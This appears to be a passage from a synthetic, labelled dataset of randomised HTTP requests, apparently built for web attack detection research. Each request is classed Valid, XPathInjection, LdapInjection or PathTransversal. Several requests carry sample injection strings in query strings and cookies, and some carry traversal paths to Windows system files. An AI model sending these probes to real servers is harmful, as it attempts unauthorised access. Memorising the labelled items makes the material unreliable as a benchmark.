Via: a5F/6.8 www.oc2ufmds.gif, pa65et/2.1 www.ieh1.htm
Transfer-Encoding: compress
Upgrade: btp6f/8.3
Warning: 682 www.8mri.png "1onheHntbcn" "Fri, 11 Dec 09 19:10:46 CET"
X-Forwarded-For: 161.13.62.114
X-Serial-Number: 891452454
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17424
Start - Id: 35598
class: XPathInjection
GET /5MtmpomKDEhtpassTKns/ms-fwCBCC/naeeM0o6Lp/HF-LDxsdD/sb0f_dLCs.sh?XetrE7pds2ssnn=62364173&om7irrh=0dGi&K@nFn=lmagu&eseFkLn2e=%28i+++%3C+++++count%28nk1ni%2Fchild%3A%3Atext%28%29%29++and++j+%3C+count%28ovH6%2Fchild%3A%3Acomment%28%29%29++and++++k++%3C+count%28sneo%2Fchild%3A%3A*%29++++%29&6yneioWnTeati=021413&l9Dthrp=bnoena&9Ycda6tets=t&HNftpp2i2eval40b=j0kl+8eFdy6ier&noWtmtsm=96PhilYpz&u5ODi=22&AIs2t4emamNwPmd=19641352&otlthme0byMdyv=e%26iyt HTTP/1.1
Host: www.cxems3.cz
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.9
Cache-Control: dro=f50mLrmm
Client-ip: 180.187.68.18
Cookie: oreeinzeto4r8e=eoytn;gthmeep=ptdsId;triSOciurzkett=o-OJqtDGNqA;nhuqx=0;9rteazee=tf-J.i5fA;uvVqmc=Ose
Cookie2: $Version="98"
Date: Thu, 28 Oct 04 11:16:18 UTC
ETag: "2IZLr6UCFS8Snl6TN"
Expect: 100-continue
From: hsgss@kOcgeesht.ch
If-Modified-Since: Fri, 10 Nov 06 10:07:00 GMT
If-Unmodified-Since: Wed, 17 Oct 07 10:23:02 UTC
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: "rwOo.Tuonx4ayEEa"
If-Range: Mon, 26 Feb 07 17:08:41 CET
Max-Forwards: 084
MIME-Version: 4.7
Pragma: msAtteao='pfv'
Proxy-Authorization: NTLM b2RXcmx2M25sdGE2b3dvcmVIaGxuZWh5b2lzdGlXWGRvdnlvUm0xZXQxbU8zYm0=
Authorization: Basic WXBkYWVkOmhlOWVkbmVu
Range: 1278-6
Referer: /kind/0a7nijja.msf
TE: trailers
Trailer: Warning
User-Agent: Mozilla/4.6 (Windows; U; WinNT 5.7; i6-rf; rv:8.1.8) Gecko/40004387
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 138x439
Via: 6.9 www.pa3eVo.css, nrop4/9.3 www.aeas.gif:883, 1.7 www.yfewB.jpeg
Transfer-Encoding: gzip
Upgrade: anfbe/0.9, m2ntt/2.0
Warning: 204 197.17.40.24 "eS4aShneveaeoeqAni" "Sun, 06 Nov 05 19:18:19 CET"
X-Forwarded-For: 93.7.188.203
X-Serial-Number: 65275952070459353
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35598
Start - Id: 50081
class: XPathInjection
POST /oais8d7ai7/dFMwv1XSP@eo/1YVbDAoTwYZHwIZ63U.html? HTTP/1.0
Content-Length: 37
Content-Language: ietihxk0
Content-Encoding: gzip
Content-Location: http://www.i3rntY.biz/sofh/AinRlhe/otvEm6e.cfm
Content-MD5: aGlFcXRyVW55bnl1bzRlcA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Aug 07 07:51:00 CET
Last-Modified: Fri, 24 Dec 04 08:25:20 CET
Host: 204.83.93.214:985
Connection: close
Accept: */*;q=0.2
Accept-Charset: gb2312, x-mac-japanese;q=0.0, x-mac-cyrillic, euc-tw;q=0.0, iso-8859-15;q=0.8
Accept-Encoding: 
Accept-Language: wsteid-Rgg4s4u, hfreget-bsm;q=0.8, wseaIeld-S;q=0.8, 7as-n
Cache-Control: max-age=04917
Client-ip: 82.164.87.92
Cookie: vbscriptIDM=nn8steayw;CQ-zH=90;fn=hSbnm1atSrThal;CQSHXXa=rvo6' or   1< irt0/pt/nlgc/child::text()[position()=18]    or     'I9' =   ';e4snnvn=eu;dhtl=execua?t
Cookie2: $Version="1"
Date: Thu, 10 Apr 08 14:00:32 CET
ETag: W/"7KYCLRxNra1b_I9g3"
Expect: rze9eY=cE9r0;eoair=a0tct2
From: a2ahor@ihbawa.net
If-Modified-Since: Tue, 16 Feb 10 22:47:17 UTC
If-Unmodified-Since: Fri, 15 Feb 08 20:35:08 CET
If-Match: "F0SmlOYRLx53okhUC"
If-None-Match: "hOv3T6eJD@nVv7xsn455"
If-Range: "goSVZVVUfu4ID2VF36Mf"
Max-Forwards: 2102
MIME-Version: 1.2
Pragma: ri1tatti='stenjd'
Proxy-Authorization: NTLM ZW9zdXFPM1lvdGU0ZmV0amlzc0ViaXRkYXRFZXRuYW50dHNsdUVzTXM=
Authorization: Digest qop=oxos
Range: 5-3248
Referer: /stXuu.nsf
TE: deflate;q=0.1,trailers
Trailer: Transfer-Encoding
User-Agent: bevnEossmnciueectc
UA-Disp: 6721,293,16
UA-OS: Solaris
UA-Color: color16
Via: FTP/3.5 93.31.41.29, 0.1 10.72.113.137
Transfer-Encoding: gzip
Upgrade: HiS/8.4
Warning: 655 8.146.131.14 "dxoce5aih3rnnfYua" "Tue, 17 Oct 06 23:28:47 GMT"
X-Forwarded-For: 111.165.36.41
X-Serial-Number: 254807
----: ---------------
~~~~~: ~~~~~~~~~~

0tusVejsadt=sw&2eaiAtMergVn=941825448

End - Id: 50081
Start - Id: 20225
class: Valid
GET /igKwj3bSxLet-/ezjluaEHnWMmg/t62tqqpgKI4r-HFPxgo/rtwm.jpg? HTTP/1.1
Host: www.mwynaytsue.com
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: euc-cn;q=0.0, x-mac-roman, iso-8859-3, iso-8859-9, iso-8859-9;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 159.155.218.29
Cookie: c3dlo=6491704;3Eboot.inihFJ@rE=hiAHB-;Eaptremo8t6s=9ohtacceszk;PRZbZElMN=ae0w=wo3Dinclude1dnodea;QMBO.0=7209;atfoumc0=iat4t
Cookie2: $Version="007"
Date: Fri, 23 Sep 05 02:44:27 GMT
ETag: W/"DSsRRUMlVut_47Tfg"
Expect: 100-continue
From: 7a8pnny@to7yoS.cz
If-Modified-Since: Mon, 20 Mar 06 24:41:49 CET
If-Unmodified-Since: Mon, 01 Feb 10 07:01:31 CET
If-Match: *
If-None-Match: "x.5jxUnEgxi3DO0"
If-Range: Wed, 17 Sep 08 05:21:03 UTC
Max-Forwards: 7768
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM aGhqb3NydGVobjZhdFhBMW90ZGtydDNyMmNFb2liSW5idG9uYUF5YmVjb2Vo
Authorization: Digest opaque="0sy97ps"
Range: 8-0,-1872,-4
Referer: http://www.hSt8ct.st/hnctE.php4
TE: chunked
Trailer: If-Match
User-Agent: ntweO (mj3rtzF; iv@yRKN22w; m2tcrB0QE6)
UA-CPU: 68000
UA-Disp: 7522,1953,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4940x047
Via: 8.2 www.aPhbvMa.png, fts/6.5 78.78.197.219
Transfer-Encoding: identity
Upgrade: ehild/2.2, sbuaee/6.5, o2oe/9.8, eape/2.8
Warning: 523 217.178.175.100 "gapNdrrwl" "Wed, 02 Jul 08 19:47:01 UTC"
X-Forwarded-For: 93.221.51.3
X-Serial-Number: 554046996797250
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20225
Start - Id: 13553
class: Valid
GET /dnena/uarkPihrGt6/0gIKAp4eM_NTVfw/orgx/0eoYbbEh1/QZyYTfMznbXme1Q/a2zaot6yg0O/tWgWgKQu4qwBY0yQR3/oIAb%u/sanope1t4mna6ebHUe.php4? HTTP/1.0
Host: www.yhh0vsj.uk
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: cp-936;q=0.5, macintosh
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 82.35.59.17
Cookie: 7irne=70;Igozaiht=62984259;qsdwotyeoavsmm=2939;3u8p=St2onsuayvl;ouhstap=06;aitni0chtMep=jhcopy)y
Cookie2: $Version="91"
Date: Tue, 16 Feb 10 02:37:29 GMT
ETag: W/"gQhz8jE0KLxYqpu"
Expect: 100-continue
From: ntyteei@sees9at.be
If-Modified-Since: Sun, 10 Aug 08 12:00:16 GMT
If-Unmodified-Since: Sat, 16 Dec 06 08:57:05 GMT
If-Match: "l2fKnY7f_UIc2Ut76"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 9.1
Pragma: isn3hrbr=oiemsdr
Proxy-Authorization: noxn uaenegsM=zmtlt
Authorization: Digest response="05aDdb32CcD93dcf828C40C2926cCd7C"
Range: 91-168
Referer: http://tAheKhUA.be/e2kignc/ihiu/emaah.jsp
TE: chunked,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/3.6 (Machintosh; U; PPC 6.2; og-t6; rv:3.0.8) Gecko/22618340
UA-CPU: x86
UA-Disp: 8631,7824,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1988x830
Via: HTTP/1.7 116.199.199.158, FTP/5.4 www.yanbh.shtml:1, FTP/1.7 www.kthynet.jpg
Transfer-Encoding: gzip
Upgrade: teu/6.7, dj3/9.0, entsiy/1.9
Warning: 043 146.69.29.103 "pLtaauntea6teETrue" 
X-Forwarded-For: 156.12.70.0
X-Serial-Number: 70032554284651
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13553
Start - Id: 17131
class: Valid
GET /sv9L/rhtn6hofwsvjtpaln0c/Ss45wtiBh8l/whnone/Cx1sPV/ivkvnR/rx92ov4sIZtiBmMY4OX/itkezdgNq4ii4eixlnu.js?eo8vs1mst=Elrrlwt0&ltiitomthepu2=tuwasybIadsntn8&Tfat9mwt=h6suTeaba0&csf=maR&eoRA0stdOrtnaad=Dlsam%24%27 HTTP/1.0
Host: 16.201.17.28:5875
Connection: close
Accept: text/*, audio/x-wav;q=0.1
Accept-Charset: macintosh;q=0.7, cp-936;q=0.1, euc-cn;q=0.9, x-mac-turkish, x-mac-arabic
Accept-Encoding: identity, gzip;q=0.4, gzip;q=0.2, identity;q=0.9, identity;q=0.7
Accept-Language: igy7ga-qrnsw
Cache-Control: min-fresh=3
Client-ip: 32.24.157.156
Cookie: mgtjteiar= nscriptqw;0y_3i=6a1o;rT8w=Bialymingtrr;Aeotnghtlrni=ciOeh5ascriptt'3ow;IwsMhseinwperi=88496469
Cookie2: $Version="727"
Date: Wed, 16 Apr 08 05:30:14 UTC
ETag: W/"2rwKyzJKSWhOnVFy"
Expect: 100-continue
From: gcEsmc@smae.st
If-Modified-Since: Fri, 04 Jul 08 07:02:27 GMT
If-Unmodified-Since: Tue, 17 Jan 06 13:28:19 UTC
If-Match: "Zlo46GqvI84FdIGb1"
If-None-Match: *
If-Range: Sat, 26 Jun 04 12:57:03 UTC
Max-Forwards: 381
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: NTLM NlJ1bGptYzlzZXBvYTdiam5pdDlubnNtSXR0aXRpY25iYWVoaDA4bGVpcW5z
Authorization: NTLM ZXBsdGNob2lyd2VjRWFwaWhlR3NhNmQ0c3NyQW90c21nZmJObDJtYWh5
Range: -3238,-691,-223750
Referer: http://t3tf.uk/Ehmmoert/drGa5r/ynee/meof.nsf
TE: gzip,chunked;q=0.1,chunked
Trailer: Cache-Control
User-Agent: mKqcK4H http://www.ewna.st
UA-CPU: StrongARM
UA-Disp: 5443,1499,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4914x5963
Via: 6.9 86.97.15.142, FTP/0.3 33.204.178.61
Transfer-Encoding: neoRi; mcrr=9cfvth1l
Upgrade: l8u/1.3, nprsae/5.5
Warning: 072 www.eIatdhnV.html "Yper3dr" "Tue, 24 Feb 09 05:55:30 UTC"
X-Forwarded-For: 125.81.27.179
X-Serial-Number: 27038419244817837
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17131
Start - Id: 37503
class: LdapInjection
GET /scripty0fCZN4DE/eGiL8WgJrjaruVJEUFwe/F4qbDCaKP./slA4sim4E/o8spm1taHlizs04qcb/eXeS7hOPaVxipinsert/Ol7dhjAhtaccesaJ0d/nRntWJIDdidcgpXEp2.tiff?eoscde=paNesdlrtmp+x%3A%296&ge=576&7iotslf6T=4&reeifatFsltr=eqOU&ueM64=i&a3JdI9=oNsihibaAsOu&GGn6wdmhehony=vdnednsss6l HTTP/1.0
Host: www.sqeeG.st
Connection: keep-alive
Accept: text/*;q=0.2, application/*
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-cache
Client-ip: 84.90.139.45
Cookie: ee=t;ndsdbaNlmCdhtaa=se86laenNqFeEl;og2=z5T)(&(objectClass    =  uu*)
Date: Sun, 12 Mar 06 23:05:17 UTC
Max-Forwards: 855
Referer: /uocsa.exe
User-Agent: Mozilla/0.4 (Windows; U; WinNT 2.8; dt-nt; rv:3.9.0) Gecko/17493436

null

End - Id: 37503
Start - Id: 29921
class: Valid
GET /tcFje_l1.v/en6hgiuiins/ba9v6seecEt7mqeeyit/cxBytW/1insertYCTXjfc%uT9l/imuR_TDmgM8mP/xAapeeypitGcte/icU/e_sqT5KAcEKnMmGM.jpeg?etohej3lahtnqsr=%7Emoincludel%7Ewq7k++S%2F%3FT%5D&saRonamnoonmrss=dursetseh3at&ElaapTTrzsht=58505584&ef=metayToptn&in=8AfiebieQrtniasmq&Idlvlosacsrnsst=asitsliygcbtarhop HTTP/1.0
Host: www.oteaddu8nl.uk
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: hz-gb-2312;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: itarit='sse'
Client-ip: 63.141.168.199
Cookie: 2b=locNts;EhssesiqeEIb=386320;sobyeih6=et;sstrOcfhyhcEjz=7d6a
Cookie2: $Version="87"
Date: Sat, 15 Aug 09 20:35:19 CET
ETag: W/"v8m.zOkL_mJaP@B9a0NR"
Expect: 100-continue
From: enAenar@sxZibNudi.uk
If-Modified-Since: Mon, 05 Jan 04 04:56:15 UTC
If-Unmodified-Since: Fri, 24 Feb 06 11:58:11 GMT
If-Match: *
If-None-Match: *
If-Range: "Ry4hcx9ln_QFPXNUXMgz"
Max-Forwards: 78
MIME-Version: 8.7
Pragma: oe='icm'
Proxy-Authorization: meaud m7h0u=nztdpF
Authorization: Digest nonce
Range: 73-062771
Referer: /elmptnu/ntannn.zip
TE: trailers,deflate,chunked
Trailer: Pragma
User-Agent: 3v4nLewln (1U8p27ckzj; wsDDQqfZWW; o8tVDim; lz6y7B; whDarg)
UA-CPU: 68000
UA-Disp: 5197,782,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 3511x216
Via: HTTP/7.3 www.ooeeain.html
Transfer-Encoding: eeYrny; kwaeeqax=sqtt
Upgrade: onb4/4.3, rcs/3.8, osine/7.9
Warning: 638 www.lba6espt.jpeg:1313 "DhxO" 
X-Forwarded-For: 180.53.116.218
X-Serial-Number: 89410
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29921
Start - Id: 8881
class: Valid
GET /p32cgVCUSG/tEvN8K8wYVGsbS9kFtR/eddteito/u3vg2oKwTFzYwYv8.mspx?H8Et=coa&rlp=flheuOpmPdRlaIna&ohhoehrvd=%401https&2Earaems5p9tnyq=1jPNjBe24v&hnu0s3Crile6b=%28pNttyaona&nnsociats=ohfr-8yoc&_wFR=hs%260topd%3Acet&9p14x=8251442 HTTP/1.1
Host: 203.94.4.135
Connection: 2wnpsiss
Accept: */*;q=0.9
Accept-Charset: euc-tw, koi8-r, big5;q=0.6, euc-cn;q=0.2, windows-1251
Accept-Encoding: deflate, identity, identity;q=0.0
Accept-Language: temcyd-eeha, xef-edczat, eoyp-e, 1ii-lbiql;q=0.5, d-aakzemul
Cache-Control: max-stale
Client-ip: 36.44.215.228
Cookie: mseciGdr5p=+;iwnmgigr3eoa=603;Df0insertsLElf=9;nfue=eEc
Cookie2: $Version="87"
Date: Thu, 29 Jul 04 21:21:45 GMT
ETag: "DGzh0Y7X9lcl9na@"
Expect: 100-continue
From: e9ioSmhn@umuDc.biz
If-Modified-Since: Tue, 20 Jun 06 22:04:27 GMT
If-Unmodified-Since: Thu, 05 Feb 04 20:34:00 GMT
If-Match: *
If-None-Match: "9SfFhpkIDIo_pFR"
If-Range: *
Max-Forwards: 3624
MIME-Version: 0.7
Pragma: alFsnset='Eh'
Proxy-Authorization: NTLM dHNyVHYxaGZzYmZhanJidG91N3NManJUbGhpaG5pc25pd2N0YXM=
Authorization: Basic ZXhsZGxzaTpnbTl1aW9y
Range: -38204
Referer: /tpeEtr/oolzh9/norA/isax.asmx
TE: trailers
Trailer: Expect
User-Agent: Mozilla/9.4 (Machintosh; U; PPC Mac OS X 6.1; hr-Us; rv:5.2.7) Gecko/00981601
UA-CPU: Sparc
UA-Disp: 012,690,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3568x0188
Via: 7.6 www.5cce.tiff, 6.2 122.215.186.172:61, HTTP/2.3 79.66.98.171
Transfer-Encoding: i8tt9i; dee3at=eHtysi
Upgrade: rudtA/2.1, e5r/5.2, Ndas/0.8, iomgfE/7.8
Warning: 595 34.218.228.95 "fFoep9Eetebeekisett" "Mon, 07 Jun 04 13:30:19 CET"
X-Forwarded-For: 38.43.108.176
X-Serial-Number: 8434759512
----: -------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8881
Start - Id: 5717
class: Valid
PUT /nEoxs/eredNylioiewrE2Npknl/sP/vQ-nJrn_AvqihT/2lteNJZQhlzY/eti9ueeddotcltoidie.shtml? HTTP/1.1
Content-Length: 89
Content-Language: p
Content-Encoding: gzip
Content-Location: http://www.6cpSloe.biz/ieJesit/heaeInyG/resr6de/rSm5/Tlm17id.tar
Content-MD5: UnNraWZpdHhmdG90YXJtbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 26 Jun 07 14:38:24 UTC
Last-Modified: Sun, 10 Sep 06 07:14:27 CET
Host: www.Dhs6tbm.st:80
Connection: keep-alive
Accept: video/mpeg;q=0.5, image/gif;q=0.6
Accept-Charset: macintosh, x-mac-japanese;q=0.3, windows-1253
Accept-Encoding: compress, identity;q=0.8, gzip, deflate;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 27.34.47.58
Cookie: ahe=V-;kUOpkKq_r=831642;goohIleaapqttkn=tFgkEF;rytohaevvovtcos=oz_
Cookie2: $Version="32"
Date: Thu, 18 Sep 08 16:07:20 UTC
ETag: "VVGNW8zSXxQI4.C1N"
Expect: yt8eeyi
From: ototLn2u@5heey.uk
If-Modified-Since: Mon, 12 Jul 04 23:51:40 UTC
If-Unmodified-Since: Thu, 25 Jan 07 04:40:45 CET
If-Match: *
If-None-Match: "LjU4m1B1M-dh@A0jyk"
If-Range: Wed, 11 Feb 04 23:58:29 UTC
Max-Forwards: 9749
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic YWlnN24yMTo2a255
Authorization: Basic ZWozbGdvOm9lYnR0b2My
Range: 40090-
Referer: /neoi4R.js
TE: deflate;q=0.3,trailers,gzip
Trailer: Date
User-Agent: 9ite/0.0.3
UA-CPU: Sparc
UA-Disp: 1912,4963,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3416x9061
Via: HTTP/8.3 156.88.239.47, HTTP/4.0 www.oant.htm, yo2e5q/6.8 www.idyo4do.css:07957
Transfer-Encoding: gzip
Upgrade: 3ewae6/1.5, hmdtw/9.4, ubskbu/3.6, Dntijt/2.7
Warning: 932 84.207.154.52 "lweaeiRmollF5" "Sun, 27 Nov 05 06:11:04 UTC"
X-Forwarded-For: 129.100.56.49
X-Serial-Number: 7835393170
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

Aryg=linkefM5admin n:Nema=i>%u&wwheudsiAe=iaccess_log ]aasystem&e3Nbsrtuy7ess=i

End - Id: 5717
Start - Id: 45107
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.1
Host: www.i6f7tonno.net
Connection: NhuAh5g
Accept: image/jpeg;q=0.5, application/*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: Mtwt-irapki;q=0.9, bsritatl-oe5aax3i, esl-heaVe;q=0.7, c4etrh-fa;q=0.9, giain-dEpdrtiE;q=0.7
Cache-Control: only-if-cached
Client-ip: 154.211.218.131
Cookie: yrfeeeMyzq5fv=60814492;fweeltud=156;KgNobjectDnSmT=nsTtsnijihoi
Cookie2: $Version="1"
Date: Wed, 27 Aug 08 09:22:19 UTC
ETag: W/"Fj-adqaO5kI8kAMZh.@"
Expect: uhxrdEf=ynXs4rl3
From: hlsgr2q@lokeQ.ch
If-Modified-Since: Wed, 24 Mar 10 19:49:09 GMT
If-Unmodified-Since: Sat, 21 May 05 16:37:33 UTC
If-Match: ".o9BF6MWinRF8EhU"
If-None-Match: *
If-Range: Wed, 16 Jun 04 07:09:52 GMT
Max-Forwards: 237
MIME-Version: 6.3
Pragma: se5d='nnfSaPsE'
Proxy-Authorization: NTLM TmhTZWRhdGhvaW9vZWlvc1dzenRmc2hhZDB1ZG5zcmFYZGQyc3Juc25uOA==
Authorization: NTLM dHRubm90ZXVlbmtpbG9ibnV0am1oY3JtZW1vOE9hZW5yYWhucnJza25hZzhldGZs
Range: -3,456-488022
Referer: http://www.TtrlTo.cz/iorna/1aon1/t3rAugnt/DNenl.jsp
TE: gzip
Trailer: Max-Forwards
User-Agent: Mozilla/8.0 (Windows; U; Win 9x 4.4; ks-wi; rv:2.0.6) Gecko/88343730
UA-CPU: StrongARM
UA-Disp: 4629,539,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 213x015
Via: FTP/9.8 www.ihnpesn.jpeg:18
Transfer-Encoding: epna; aoO9=ueeynNrw
Upgrade: ud4hrt/2.8, ifephn/3.0, adtIIr/9.5, oHsuT3/8.9
Warning: 131 165.136.34.196 "tchbajdsaa" "Fri, 12 Mar 10 18:52:44 CET"
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 888948293
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45107
Start - Id: 14364
class: Valid
GET /vorJitbB3g2LL95V/t-x.boK_bnfHPm3Dqge/aq27dQVdN7W1k_b/oamSrsxo/eHsfU6/sNX8N63w2LO11/dropu3psNTq8mCwdCl.tiff?smmg9=ge8giaRl&pur5drwt=y3%3Fnbpxet&rsfc8wt=35653726&1mlno9yxwnza=62264&beBn8ii3n=je7evg&@Nacceptw=67304892&tuts=atle3se2tveElt6dn&Loa7tsifid=j%28%5Blxena&0yvbscriptg6gO=0645608&xceyaOwnbii4=hbr9aasaeeaVeho HTTP/1.0
Host: 237.249.65.198
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: cee=nier
Client-ip: 116.30.82.245
Cookie: tateAhs6ztg='|oscriptg;hoe=5;aoe8nlhthanrssl=o%;le=utz0RedhonCoalq3ou;ihjn=nI;ngseIr=h@LJ
Cookie2: $Version="06"
Date: Mon, 16 Jan 06 19:40:45 CET
ETag: "7njj5OVoZqM.3eQk5x0"
Expect: 100-continue
From: Esys@smxt.fr
If-Modified-Since: Tue, 06 Jan 04 18:39:39 CET
If-Unmodified-Since: Sat, 28 Jun 08 10:54:09 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 93
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: are8Hq iWu7=vneaiwu
Authorization: Digest username="hoio"
Range: -8,95-
Referer: /saorl/haoi.wav
TE: deflate
Trailer: Accept
User-Agent: nesntEomknn8rsmutndq
UA-CPU: PowerPC
UA-Disp: 566,1872,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8463x313
Via: 1.8 www.ohsa3.js, 8.5 www.ursNidq.jpeg:75, 3.6 www.u9je.jpg
Transfer-Encoding: gzip
Upgrade: wheId8/6.7, oho/8.8, eubuhs/7.6
Warning: 602 www.usoFyOoy.jpg:8520 "Eoitcrxehi3nma6uas" "Wed, 04 Jul 07 21:38:06 GMT"
X-Forwarded-For: 54.65.208.97
X-Serial-Number: 97794258051819515
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 14364
Start - Id: 71
class: Valid
GET /mt/ltnAeenaorll3esdntih/naVwWfHN/BRHwU46Zinput/fstyledeleteqeYZVwinntK77-.jpeg?aemsm=0wdrtrtuuatbOua&eanewsestpaaa=ece&omoawFO=csshsiltydvw&9scripthtacces3samDw=7576&iC6bin=79509293&sd1ahppiibts1=tPSYPB HTTP/1.0
Host: www.33spwf.cz
Connection: eomEta0
Accept: */*
Accept-Charset: x-mac-cyrillic, iso-8859-3, hz-gb-2312;q=0.6
Accept-Encoding: 
Accept-Language: p-icc;q=0.6
Cache-Control: max-age=72384
Client-ip: 2.252.143.150
Cookie: Or6oaae7aizea5=84151314
Cookie2: $Version="646"
Date: Sat, 29 Oct 05 17:18:55 CET
ETag: W/"8WaPHksYP7X6FJt_"
Expect: 100-continue
From: hhfiYtat@W0diMywt.it
If-Modified-Since: Fri, 05 Feb 10 03:15:09 UTC
If-Unmodified-Since: Tue, 27 Jan 04 12:30:16 CET
If-Match: *
If-None-Match: "aYaoVac9tiu6nZ4"
If-Range: Thu, 18 Sep 08 23:22:46 CET
Max-Forwards: 4
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: pVlh asmms=iwoa
Authorization: gctSq hga16ura=deehf0
Range: 1364-
Referer: /2awwv0o3.ace
TE: deflate;q=0.3,trailers,deflate;q=0.1
Trailer: Date
User-Agent: 2rlerBgl http://www.wtxl.st
UA-CPU: MIPS
UA-Disp: 4994,968,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5749x1102
Via: eOee2/8.3 151.45.48.186, 6.7 www.srseeao.html, 5.2 www.oduenEr.html
Transfer-Encoding: tbnEb
Upgrade: 8wp/1.6, oh2/7.9, litly/2.3
Warning: 754 165.186.54.133:11 "ceaa7ahtoenmn" 
X-Forwarded-For: 210.73.117.164
X-Serial-Number: 365994
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 71
Start - Id: 44748
class: PathTransversal
GET /2Xgq.tiff?1fhwrhihf=doc%28++file%3A%2F%2F%2Fc%3A%2Ftfy%2Frwepxse.xml+%29 HTTP/1.1
Host: 11.86.239.54:80
Connection: close
Accept: */*
Accept-Charset: utf-7, x-mac-korean;q=0.6
Accept-Encoding: compress;q=0.3
Accept-Language: e-sw;q=0.1, o-kee3bh, toowte-3tn;q=0.2, lie-es5bai
Cache-Control: d5ei='q0r1'
Client-ip: 239.84.56.120
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="80"
Date: Mon, 20 Aug 07 10:45:13 UTC
ETag: "NxGNKHZyoiZDQDfNgr"
Expect: seeEneF
From: rairnenr@fiohetan.org
If-Modified-Since: Sun, 29 May 05 14:18:10 CET
If-Unmodified-Since: Mon, 02 Jan 06 17:12:06 GMT
If-Match: *
If-None-Match: *
If-Range: "isGqpE53p-LmxJdZ-hE_"
Max-Forwards: 3
MIME-Version: 7.9
Pragma: e00c='d'
Authorization: Digest nonce
Range: 1396-,5-33,-622
Referer: /gsane07e/awuodmE/iisetwt/dditI.php
TE: gzip,trailers,deflate;q=0.6
Trailer: TE
User-Agent: nhvaFq/0.7
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 7624x8326
Via: Ieukni/7.3 www.Iksh.jpg, FTP/8.6 www.go795Ci.gif, HTTP/7.2 69.246.49.53
Transfer-Encoding: a7t2da
Upgrade: Qya/6.2
Warning: 004 www.hraiWc.shtml:490 "nb9ae9ph" "Wed, 28 Apr 10 17:57:42 GMT"
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 7113830026427564096
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44748
Start - Id: 9521
class: Valid
GET /xpLnesfe7rEghinco/soItcooarseh.gif? HTTP/1.1
Host: www.coz6h.it
Connection: close
Accept: application/postscript;q=0.1, audio/x-wav, text/*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, deflate;q=0.4, deflate;q=0.9, compress, identity
Accept-Language: *;q=0.1
Cache-Control: min-fresh=1
Client-ip: 95.57.226.135
Cookie: Enmdiayl0e=ede@
Cookie2: $Version="68"
Date: Wed, 14 Apr 10 04:22:06 GMT
ETag: "wRi26HRC9bfcc@uOd"
Expect: 100-continue
From: i2nofe@soetse.biz
If-Modified-Since: Tue, 07 Sep 04 20:34:44 UTC
If-Unmodified-Since: Sat, 21 Apr 07 22:38:27 GMT
If-Match: "82SrJtFxbyZRb8gHJcb"
If-None-Match: "dWaL.Q.bHtkZP0P."
If-Range: "RtIcaAauQYRCPN."
Max-Forwards: 0
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: UraeR rlDgih=Tobabi
Authorization: noweu 4nrus=drhaeaol
Range: 4-77
Referer: /nntjG/1htA6.jpg
TE: gzip
Trailer: Range
User-Agent: Mozilla/7.5 (X11; U; Linux i586 8.9; I9-I8; rv:2.4.0) Gecko/35806314
UA-CPU: 68000
UA-Disp: 389,574,16
UA-OS: Win98
UA-Color: color16
